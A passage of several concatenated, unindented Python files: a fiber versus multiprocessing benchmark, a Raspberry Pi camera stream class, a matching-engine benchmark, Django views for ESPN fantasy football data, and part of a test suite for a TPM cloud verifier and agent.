"""Synchronize write and read."""
send_q = mplib.SimpleQueue()
put = False
for num in range(NUM):
if num % 1000 == 0:
put = not put
print(datetime.now().strftime("%H:%M:%S.%f"), "put" if put else "get", num)
if put:
send_q.put(MSG)
else:
send_q.get()
def bench(func, mplib=fiber):
"""Benchmark func with a multiprocessing lib: fiber or multiprocessiong."""
start_time = time.time()
func(mplib)
end_time = time.time()
duration = end_time - start_time
msg_per_sec = NUM / duration
doc = func.__doc__.strip() if func.__doc__ is not None else ""
print("Benchmark result - {} - {}\n{}".format(func.__name__, mplib.__name__, doc))
print("Duration: {}".format(duration))
print("Messages Per Second: {}".format(msg_per_sec))
print("Effective Data Rate: {} Mbps".format(msg_per_sec * len(MSG) * 8 / 1e6))
def pi_inside(p):
x, y = random.random(), random.random()
return x * x + y * y < 1
def pi_estimation(mp_lib):
"""Benchmark pi estimation with random number sampling."""
NUM_SAMPLES = int(2e4)
pool = mp_lib.Pool(processes=4)
count = sum(pool.map(pi_inside, range(0, NUM_SAMPLES)))
print("Pi is roughly {}".format(4.0 * count / NUM_SAMPLES))
def compare(func):
"""Run func with both multiprocessing and fiber."""
start_time = time.time()
func(mp)
end_time = time.time()
duration1 = end_time - start_time
doc = func.__doc__.strip() if func.__doc__ is not None else ""
print("Compare result - {}\n{}".format(func.__name__, doc))
print("multiprocessing duration: {}".format(duration1))
start_time = time.time()
func(fiber)
end_time = time.time()
duration2 = end_time - start_time
print("fiber duration: {}".format(duration2))
print("fiber vs. multiprocessing: {:.2%}".format(duration2 / duration1))
if __name__ == "__main__":
#bench(single_queue_sync_rw, mplib=fiber)
#bench(single_queue_mp_write, mplib=fiber)
#compare(pi_estimation)
compare(single_queue_sync_rw)
#compare(single_queue_mp_write)
|
picam.py
|
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import cv2
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=32, rotation=0):
# initialize the camera and stream
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.camera.rotation = rotation
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
for f in self.stream:
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
# if the thread indicator variable is set, stop the thread
# and resource camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
benchmark.py
|
import socket
import json
import threading
import random
from timeit import default_timer as timer
import engine as m_engine
import server as m_server
def direct_benchmark(nr_of_orders, midpoint=100):
engine = m_engine.MatchingEngine()
orderbook_size = len(engine.orderbook)
orders = []
for i in range(nr_of_orders):
side = random.choice(["buy", "sell"])
price = random.gauss(midpoint, 5)
quantity = random.expovariate(0.05)
orders.append(m_engine.Order("Null", "limit", side, price, quantity))
start = timer()
for order in orders:
engine.process(order)
end = timer()
t = end - start
print('{0} orders processed over {1:.2f} seconds,'.format(nr_of_orders, t))
print("at an average speed of {0:.0f} orders/second or {1:.2f} microseconds/order,".format((nr_of_orders/t), (t/nr_of_orders) * 1000 * 1000))
print('resulting in {0} new orders in the book and {1} trades.'.format( len(engine.orderbook)-orderbook_size, len(engine.trades)))
def socket_benchmark(nr_of_orders, midpoint=100):
engine = m_engine.MatchingEngine()
server = m_server.MatchingEngineServer(("localhost", 8080), engine)
t = threading.Thread(target=server.serve_forever)
t.daemon = True
t.start()
orderbook_size = len(engine.orderbook)
orders = []
for i in range(nr_of_orders):
side = random.choice(["buy", "sell"])
price = random.gauss(midpoint, 5)
quantity = random.expovariate(0.05)
orders.append({'id': 0, 'type': 'limit', 'side': side, 'price': price, 'quantity': quantity})
start = timer()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", 8080))
for order in orders:
serialized_order = json.dumps(order).encode('utf-8')
sock.sendall(serialized_order)
acknowledge = str(sock.recv(1024), "utf-8")
end = timer()
t = end - start
print('{0} orders processed over {1:.2f} seconds,'.format(nr_of_orders, t))
print("at an average speed of {0:.0f} orders/second or {1:.2f} microseconds/order,".format((nr_of_orders/t), (t/nr_of_orders) * 1000 * 1000))
print('resulting in {0} new orders in the book and {1} trades.'.format( len(engine.orderbook)-orderbook_size, len(engine.trades)))
socket_benchmark(100000)
|
views.py
|
# -*- coding: utf-8 -*-
from datetime import datetime
from django.contrib.auth.models import User
from django.http import Http404
from django.shortcuts import render
from espnff import League
from rest_framework import authentication, permissions
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from threading import Lock, Thread
#############################
#
# General Utils
#
#############################
mutex = Lock()
def getCurrentYear():
now = datetime.now()
if (now.month < 8):
return now.year - 1
return now.year
def toDict(obj):
return obj.__dict__
#############################
#
# ESPN FF API Utils
#
#############################
def createLeagueObject(leagueId, year=getCurrentYear()):
return League(leagueId, year)
def serializeBasicTeam(team):
if not team:
return {}
return {
'team_id': team.team_id,
'team_name': team.team_name,
'wins': int(team.wins),
'losses': int(team.losses),
'owner': team.owner
}
def serializeMatchup(matchup):
matchup.home_team = serializeBasicTeam(matchup.home_team)
matchup.away_team = serializeBasicTeam(matchup.away_team)
return toDict(matchup)
def serializeRankings(rankings):
return map(lambda pair: { 'score': float(pair[0]), 'team': serializeBasicTeam(pair[1]) }, rankings)
def serializeTeam(team):
team.schedule = list(map(lambda t: serializeBasicTeam(t), team.schedule))
return toDict(team)
def threadedBuildHistoryFromMatchups(league, teamHistory, teamId):
for week in list(range(1, 18)):
try:
scoreboard = league.scoreboard(week=week)
except:
break
else:
matchup = None
opponentOwner = None
opponentId = None
opponentSide = None
side = None
for m in scoreboard:
if (m.home_team.team_id == int(teamId)):
matchup = m
side = 'home'
opponentOwner = m.away_team.owner
opponentId = str(m.away_team.team_id)
opponentSide = 'away'
elif (m.away_team.team_id == int(teamId)):
matchup = m
side = 'away'
opponentOwner = m.home_team.owner
opponentId = str(m.home_team.team_id)
opponentSide = 'home'
if (matchup and matchup.data['winner'] != 'undecided'):
mutex.acquire()
try:
if (not opponentId in teamHistory['matchupHistory']):
teamHistory['matchupHistory'][opponentId] = {
'margin': 0,
'marginOfDefeat': 0,
'marginOfVictory': 0,
'opponentName': opponentOwner,
'losses': 0,
'ties': 0,
'wins': 0
}
if (matchup.data['winner'] == side):
teamHistory['wins'] += 1
teamHistory['margin'] += abs(m.home_score - m.away_score)
teamHistory['marginOfVictory'] += abs(m.home_score - m.away_score)
teamHistory['matchupHistory'][opponentId]['wins'] += 1
teamHistory['matchupHistory'][opponentId]['margin'] += abs(m.home_score - m.away_score)
teamHistory['matchupHistory'][opponentId]['marginOfVictory'] += abs(m.home_score - m.away_score)
elif (matchup.data['winner'] == opponentSide):
teamHistory['losses'] += 1
teamHistory['margin'] += (-1 * abs(m.home_score - m.away_score))
teamHistory['marginOfDefeat'] += (-1 * abs(m.home_score - m.away_score))
teamHistory['matchupHistory'][opponentId]['losses'] += 1
teamHistory['matchupHistory'][opponentId]['margin'] += (-1 * abs(m.home_score - m.away_score))
teamHistory['matchupHistory'][opponentId]['marginOfDefeat'] += (-1 * abs(m.home_score - m.away_score))
else:
teamHistory['ties'] += 1
teamHistory['matchupHistory'][opponentId]['ties'] += 1
finally:
mutex.release()
#############################
#
# Views
#
#############################
@api_view(['GET'])
def getTeams(request, leagueId, year=getCurrentYear()):
league = createLeagueObject(leagueId, year)
teams = list(map(lambda team: serializeTeam(team), league.teams))
response = { 'teams': teams }
return Response(response)
@api_view(['GET'])
def getTeam(request, leagueId, teamId, year=getCurrentYear()):
league = createLeagueObject(leagueId, year)
team = None
for t in league.teams:
if t.team_id == int(teamId):
team = t
if not team:
raise Http404('Team does not exist')
return Response(serializeTeam(team))
@api_view(['GET'])
def getPowerRankings(request, leagueId, year=getCurrentYear()):
league = createLeagueObject(leagueId, year)
week = league.teams[0].wins + league.teams[0].losses
rankings = league.power_rankings(week=week)
return Response({ 'rankings': serializeRankings(rankings), 'week': week })
@api_view(['GET'])
def getScoreboard(request, leagueId, year=getCurrentYear()):
league = createLeagueObject(leagueId, year)
scoreboard = map(lambda matchup: serializeMatchup(matchup), league.scoreboard())
return Response({ 'scoreboard': scoreboard })
@api_view(['GET'])
def getTeamHistory(request, leagueId, teamId):
error = None
teamHistory = {
'margin': 0,
'marginOfDefeat': 0,
'marginOfVictory': 0,
'losses': 0,
'ties': 0,
'wins': 0,
'matchupHistory': {}
}
year = getCurrentYear()
listOfThreads = []
while (not error):
try:
league = createLeagueObject(leagueId, year)
except:
error = True
else:
if (int(leagueId) == 336358 and year == 2010):
error = True
continue;
team = None
for t in league.teams:
if t.team_id == int(teamId):
team = t
if (team):
t = Thread(target = threadedBuildHistoryFromMatchups, args=(league, teamHistory, teamId))
t.start()
listOfThreads.append(t)
year -= 1
for thread in listOfThreads:
thread.join()
games = teamHistory['wins'] + teamHistory['losses'] + teamHistory['ties']
teamHistory['margin'] = round(teamHistory['margin'] / games, 2)
teamHistory['marginOfDefeat'] = round(teamHistory['marginOfDefeat'] / teamHistory['losses'], 2)
teamHistory['marginOfVictory'] = round(teamHistory['marginOfVictory'] / teamHistory['wins'], 2)
for matchup in teamHistory['matchupHistory']:
matchup = teamHistory['matchupHistory'][matchup]
games = matchup['wins'] + matchup['losses'] + matchup['ties']
matchup['margin'] = round(matchup['margin'] / games, 2)
matchup['marginOfDefeat'] = round(matchup['marginOfDefeat'] / matchup['losses'], 2)
matchup['marginOfVictory'] = round(matchup['marginOfVictory'] / matchup['wins'], 2)
return Response(teamHistory)
|
oldtest.py
|
'''
SPDX-License-Identifier: BSD-2-Clause
Copyright 2017 Massachusetts Institute of Technology.
'''
import unittest
import threading
import tornado_requests
import os
import json
import base64
import configparser
import common
import crypto
import tempfile
import signal
import subprocess
import queue
import uuid
import time
import tenant
from distutils.dir_util import copy_tree
import shutil
sentinel=None
cv_process = None
cn_process = None
cn_process_list = []
queue = queue.Queue()
num_threads = 5
config = configparser.RawConfigParser()
config.read(common.CONFIG_FILE)
cloudverifier_port = config.get('general', 'cloudverifier_port')
cloudagent_port = config.get('general', 'cloudagent_port')
registrar_port = config.get('general', 'registrar_port')
cloudagent_ip = config.get('tenant', 'cloudagent_ip')
cloudverifier_ip = config.get('tenant', 'cloudverifier_ip')
registrar_ip = config.get('tenant', 'cloudverifier_ip')
tpm_policy = json.loads(config.get('tenant', 'tpm_policy'))
my_cert = config.get('tenant', 'my_cert')
ca_cert = config.get('tenant', 'ca_cert')
private_key = config.get('tenant', 'private_key')
test_num_cloudagents = config.getint('general','test_num_cloudagents')
test_duration = config.getint('general','test_duration')
# cv_persistence_filename = config.get('cloud_verifier', 'persistence_filename')
# en_persistence_filename = config.get('registrar', 'persistence_filename')
cv_persistence_filename = None
en_persistence_filename = None
K = None
U = None
V = None
def readKUV():
global K, U, V
# read the keys in
f = open('content_keys.txt','r')
K = base64.b64decode(f.readline())
U = base64.b64decode(f.readline())
V = base64.b64decode(f.readline())
f.close()
def text_callback(request, context):
context.status_code = 402
return '{}'
class Test(unittest.TestCase):
cloudverifier_process = None
@classmethod
def setUpClass(cls):
cls.test_table = {
"test_cloudagent_tenant_get_nonce" : {
"prerun_function" : {"name":"launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_nonce",
"http_request_verb":"GET",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_query": {"nonce":"ThisIsThePasswordABC"},
"http_request_path": "/v1/quotes/tenant",
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_cloudagent_tenant_get_nonce"},
}
],
"postrun_function" : {"name":"kill_cloudagent", "argument": None},
},
"test_cloudagent_tenant_get_quote" : {
"prerun_function" : {"name":"launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_quote",
"http_request_verb":"POST",
"http_request_ip": cloudagent_ip,
"http_request_port":cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_body": '{"encrypt_check": "K+oD4GfBMAdOFy94ZxTU2hB77tySSB75VVz2Zo4jN02txhNK2KiO5JhE1SRIUVASMZMW/VQUS9WgWdCUaJ+LOTWSuQ13alG4P4cLoamBr9c=","encrypted_key":"rBWIxK4i6zTl/M69Yyh2hmX+itDR9QCx4CIqmuRrEN3JAIUc2M+balr8gPD9r3Bs0OxYRC8/kcxBNo9Bsm93WZKwlmbZt2uVxhfaAqXwdGVpMBnM3bQnAEj1LIFoZZyQ48PVIdrEO4WW73Z2X3fplEFgOC3YT3lzluYgrn8iBkMRm+o2pJMdhynh6xLguszLX7qDOccPIIJch14ftWlsy6Ya9a6LHr9+hIfs4p2ATVVSl1wtUbf/ouNJdqUPAiFc4oXsg+kHQzWWiipjsAm871cA4wlvUb+/D4mFz1p3PRAK9hcICGwKoanWh8jbeuYnoqkch2EoHeLqayrisfNogg=="}',
"http_result_status_expected": 200,
}
],
"postrun_function" : {"name":"kill_cloudagent", "argument": None},
},
"test_cloudverifier_tenant_provide_v" : {
#"prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudverifier_tenant_provide_v",
#"pre_function" : {"name":"do_mock_for_test_cloudverifier_tenant_provide_v", "argument": None},
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
#"concurrent_instances" : 10,
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
],
},
"test_concurrent_access" : {
"prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_concurrent_access",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"concurrency" : {"instances": 5, "new_thread_function":"new_thread"},
"test_iterations" : 100,
},
],
"state_validation_functions": [
{
"function_name": "test_agent_id_list",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
#"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_and_delete_all_entries", "argument": 500}
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_concurrent_cloudnodiness" : {
#"prerun_function" : {"name":"launch_cloudagents", "args": {'starting_port':9000, 'num_cloudagent_instances':250}},
"prerun_function" : {"name":"launch_cloudagents", "args": {'port_file':'cloudagent_port.txt', 'num_cloudagent_instances':test_num_cloudagents}},
"state_change_functions": [
{
"pre_function" : {"name":"test_concurrent_cloudnodiness_modify_request", "argument": 500},
"function_name": "test_concurrent_cloudnodiness",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C00000","cloudagent_ip":"cloudagent_ip.txt","cloudagent_port":"cloudagent_port.txt","tpm_policy": {"22":"ffffffffffffffffffffffffffffffffffffffff","16":"0000000000000000000000000000000000000000"} }',
"http_result_status_expected": 200,
"test_iterations" : test_num_cloudagents,
"post_function" : {"name":"test_concurrent_cloudnodiness_reset_request", "args": {"ip_file": "cloudagent_ip.txt","port_file":"cloudagent_port.txt"} },
},
],
"postrun_function" : {"name":"kill_cloudagents_after_delay", "args": {'sleep': test_duration, 'port_file':'cloudagent_port.txt', 'num_cloudagent_instances':test_num_cloudagents} },
},
"test_full_integration_happy_path" : {
#"prerun_function" : {"name":"launch_required_servers", "argument": None},
"state_change_functions": [
{
"function_name": "do_cloudagent_part",
"http_request_verb":"GET",
"http_request_ip": cloudagent_ip,
"http_request_port":cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_query": {"nonce":"ThisIsThePasswordABC"},
"http_result_status_expected": 200,
"check_function" : {"name":"provide_e"},
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
{
"function_name": "do_cloudverifier_part",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "XrNfEiODfu1fdXGtWbA+Wk02UhBxx1jTq7zhbC54ROA=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C866E9","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_sleep", "argument": 5},
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
],
#"postrun_function" : {"name":"kill_required_servers", "argument": None},
},
"test_persistance_file_load" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{"06480EC4-6BF3-4F00-8323-FE6AE5868297": {"tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}, "ip": "127.0.0.1", "port": "8882", "v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU="}}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_load",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_persistance_file_load", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_write" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_write",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_persistance_file_write", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_bad" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{'},
},
"test_persistance_file_empty" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": ''},
"state_change_functions": [
{
"function_name": "test_persistance_file_empty",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_nonexistent" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": None},
"state_change_functions": [
{
"function_name": "test_persistance_file_nonexistent",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
}
def test_concurrent_cloudnodiness(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_nonce(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_quote(self):
self.execute_test_definition()
def test_cloudverifier_tenant_provide_v(self):
self.execute_test_definition()
def test_concurrent_access(self):
self.execute_test_definition()
def test_full_integration_happy_path(self):
self.execute_test_definition()
def test_persistance_file_load(self):
self.execute_test_definition()
def test_persistance_file_write(self):
self.execute_test_definition()
def test_persistance_file_bad(self):
self.execute_test_definition()
def test_persistance_file_empty(self):
self.execute_test_definition()
def test_persistance_file_nonexistent(self):
self.execute_test_definition()
def test_cloudagent_cloud_verifier_get_quote(self):
pass
def check_test_sleep(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
time.sleep(argument)
#'{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
def read_line_in_file(self, infile, line_number):
with open(infile) as fp:
for i, line in enumerate(fp):
if i == line_number:
return line
def sleep_for_a_while(self, argument):
time.sleep(float(argument))
def test_concurrent_cloudnodiness_modify_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
tmpp_policy = json_request_body['tpm_policy']
mask = 0
for key in list(tmpp_policy.keys()):
if key.isdigit() :
mask = mask + (1<<int(key))
mask_str = "0x%X"%(mask)
tmpp_policy['mask'] = mask_str
json_request_body['tpm_policy'] = tmpp_policy
cloudagent_ip = json_request_body['cloudagent_ip']
if cloudagent_ip.endswith('.txt'):
cloudagent_ip_file = cloudagent_ip
cloudagent_ip_read_from_file = self.read_line_in_file(cloudagent_ip_file, test_iteration)
json_request_body['cloudagent_ip'] = cloudagent_ip_read_from_file.strip()
cloudagent_port = json_request_body['cloudagent_port']
if cloudagent_port.endswith('.txt'):
cloudagent_port_file = cloudagent_port
cloudagent_port_read_from_file = self.read_line_in_file(cloudagent_port_file, test_iteration)
json_request_body['cloudagent_port'] = cloudagent_port_read_from_file.strip()
# parser = ConfigParser.RawConfigParser()
# parser.read(common.CONFIG_FILE)
# test_agent_uuid = parser.get('general', 'agent_uuid')
test_agent_uuid = json_request_body['agent_id']
port_string_length = len(str(json_request_body['cloudagent_port']))
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + str(json_request_body['cloudagent_port'])
json_request_body['agent_id'] = contrived_uuid
test_functions['http_request_body'] = json.dumps(json_request_body)
except Exception as e:
self.fail("Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s"%e)
def test_concurrent_cloudnodiness_reset_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
#time.sleep(2)
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
#reset the request body to file arguments for next iteration
json_request_body['cloudagent_ip'] = argument["ip_file"]
json_request_body['cloudagent_port'] = argument["port_file"]
test_functions['http_request_body'] = json.dumps(json_request_body)
except Exception as e:
self.fail("Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s"%e)
def test_check_persistance_file_empty(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
try:
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 0:
self.fail("Expected empty persistence file to replace non existent persistence file on startup.")
except Exception as e:
self.fail("Problem reading persistence file after replacement of empty persistence file. Error: %s"%e)
def check_test_persistance_file_write(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
try:
with open(cv_persistence_filename, "r") as persistance_file:
file_contents = persistance_file.read()
json_content = json.loads(file_contents)
if len(json_content) != 1 or json_content.get(uuid_str) is None:
self.fail("Unexpected persistence file contents.")
except Exception as e:
self.fail("Problem reading persistence file after POST. Error: %s"%e)
try:
with open(cv_persistence_filename + ".bak", "r") as backup_persistance_file:
backup_file_contents = backup_persistance_file.read()
json_backup_content = json.loads(backup_file_contents)
if len(json_backup_content) != 0:
self.fail("Unexpected backup persistence file contents.")
except Exception as e:
self.fail("Problem reading backup persistence file after POST. Error: %s"%e)
def check_test_persistance_file_load(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 1 or jsondecoded.get(uuid_str) is None :
self.fail("Expected " + uuid_str + " to be in the list of active agent_ids")
# def do_mock_for_test_cloudverifier_tenant_provide_v(self, argument):
# global text_callback
# nonce = tpm_initialize.random_password(20)
# tpm_policy = {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff" }
# #theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier" + "?nonce=" + nonce + "&mask=" + tpm_policy['mask']
# theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier"
# with requests_mock.Mocker(real_http=True) as m:
# m.get(requests_mock.ANY, text=text_callback)
def provide_e(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
response_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(response_body)
public_key = jsondecoded.get("pubkey")
quote = jsondecoded.get("quote")
# test to make sure these two keys (and values) are in the return
if public_key == None or quote == None:
self.fail("Expected both pubkey and quote arguments." )
else:
mytenant = tenant.Tenant()
# command line options can overwrite config values
mytenant.cloudagent_ip = cloudagent_ip
mytenant.cloudverifier_ip = cloudverifier_ip
mytenant.agent_uuid = "C432FBB3-D2F1-4A97-9EF7-75BD81C866E9"
if mytenant.validate_tpm_quote(public_key, quote):
# encrypt U with the public key
global U, K
encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key),str(U))
encrypt_check = crypto.do_hmac(K,mytenant.agent_uuid)
b64_encrypted_u = base64.b64encode(encrypted_U)
data = {
'encrypted_key': b64_encrypted_u,
'encrypt_check': encrypt_check
}
u_json_message = json.dumps(data)
#post encrypted U back to Cloud Agent
response = tornado_requests.request("POST", "http://%s:%s/v1/quotes/tenant"%(cloudagent_ip,cloudagent_port),data=u_json_message)
if response.status_code != 200:
self.fail("Posting of Encrypted U to the Cloud Agent failed with response code %d" %response.status_code )
else:
self.fail("TPM Quote from cloud agent is invalid for nonce: %s"%self.nonce )
def check_test_cloudagent_tenant_get_nonce(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if jsondecoded.get("pubkey") == None or jsondecoded.get("quote") == None:
self.fail("Expected both pubkey and quote arguments." )
def check_validate_test_cloudverifier_tenant_provide_v(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
v = jsondecoded.get("v")
ip = jsondecoded.get("ip")
port = jsondecoded.get("port")
tpm_policy = jsondecoded.get("tpm_policy")
if v is None or v != "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=":
self.fail("Returned v from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if ip is None or ip != "127.0.0.1":
